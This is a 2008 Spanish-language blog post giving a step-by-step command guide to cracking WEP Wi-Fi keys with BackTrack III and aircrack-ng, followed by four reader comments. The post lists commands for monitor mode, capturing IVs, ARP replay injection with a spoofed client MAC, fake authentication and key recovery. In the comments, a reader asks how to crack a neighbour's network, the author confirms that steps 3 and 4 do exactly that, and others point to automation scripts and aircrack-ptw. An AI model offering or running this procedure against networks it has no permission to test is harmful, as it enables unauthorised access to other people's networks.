jueves, abril 10, 2008

Ataques Wep


El aburrimiento y ganas de hacer el tonto hizo que descargara Back Track III y lo probara, pues bien, contar que genial y todo a la primera, nos viene con nuevos controladores y a mi, que no me funcionaba bien en mis Apple's, en el MacMini ha funcionado muy bien. Escribo una pequeña guía que he seguido yo y ha funcionado muy bien, sólo hay que usar la consola de BT3:
1.- El primer paso que debe realizar es poner la tarjeta de red en modo monitor:

~# airmon-ng start wlan0

2.- Ahora ejecute airodump-ng para que guarde los paquetes IVs(necesarios para realizar el ataque):

~# airodump-ng -w datos wlan0

Para mejorar el ataque paramos lo anterior con CTRL+c y añadimos a la instrucción el canal específico a capturar(ej. 11):

~#airodump-ng --ivs -w datos -c 11 wlan0

3.- Ahora solo nos falta acelerar el proceso de captura de IVs, mediante el inyectado de tráfico desde el edquipo del atacante. Para ello utilizará el cliente autenificado y asociado en el paso siguiente. Hay que esperar a que capture un paquete ARP-request, para luego reinyectarlo en la red para que aumente drásticamente el número de paquetes IVs:

~# aireplay-ng -3 -b MAC_AP -h MAC_FALSO_CLIENTE -x 600 wlan0

donde -3 indica el tipo de ataque, y -x 600 permite indicar la velocidad con la que reinyecta paquetes.(Utilizar una consola disitinta).

4.- Ahora para poder hacer el inyectado de paquetes va a autentificarse y asociarse con un cliente ficticio de la red:

~#aireplay-ng -1 10 -e essid -a MAC_AP -h MAC_FALSO_CLIENTE wlan0

donde -1 10 indica que va a enviar 10 paquetes de autentificación, -a MAC_AP indica la dirección MAC del punto de acceso y -h MAC_FALSO_CLIENTE indica una dirección MAC falsa.

Último paso.- Ahora ya puede ejecutar en otra consola aircrack-ng para que vaya analizando los paquetes IVs obtenidos por airodump-ng y almacenados en el fichero datos-01.ivs(otra consola):

~#aircrack-ng -0 datos-01.ivs

4 comentarios:

Borazuwarah dijo...

mmmm
muy interesante
para desencriptar la mia estupendo pero... como hago para aunmetar los DATA de mi vecino sin llamar a la puerta y decirleeee ("e tu.. para que copño quieres internet? ...porkno te pones y descargas con tu portatil un puñado de arxivos gordos??") esque para la mia me ha pedido 50000 Paquetes... y sin problema con paciencia se los he dado pero para el vacino....¿? alguna idea?? muxas gracias de antemano un super aporte

xaelvil dijo...

Los pasos 3 y 4 son precisamente para eso, para inyectar tráfico al router de tu "amigo" ;)

Víctor dijo...

Weee!

Aqui dejo mi primer comentario en tu blog, en este tema que me parece superinteresante.

Para aquellos a los que no les guste estar tecleando comandos y tal, existe un script que te automatiza todo el proceso: airscript.

Tambien recomiendo la distibución WifiSlax, otro liveCD que contiene todo lo necesario para la desencriptación.

Saludos!

miguelo dijo...

hola
otra forma de obtener la clave
mucho mas facil es utilizar
aircrack-ptw archivo.cap-01.cap

con este comando nos da el pass
sin utilizar la fuerza bruta
solo necesitamos alrrededor de
25000 paquetes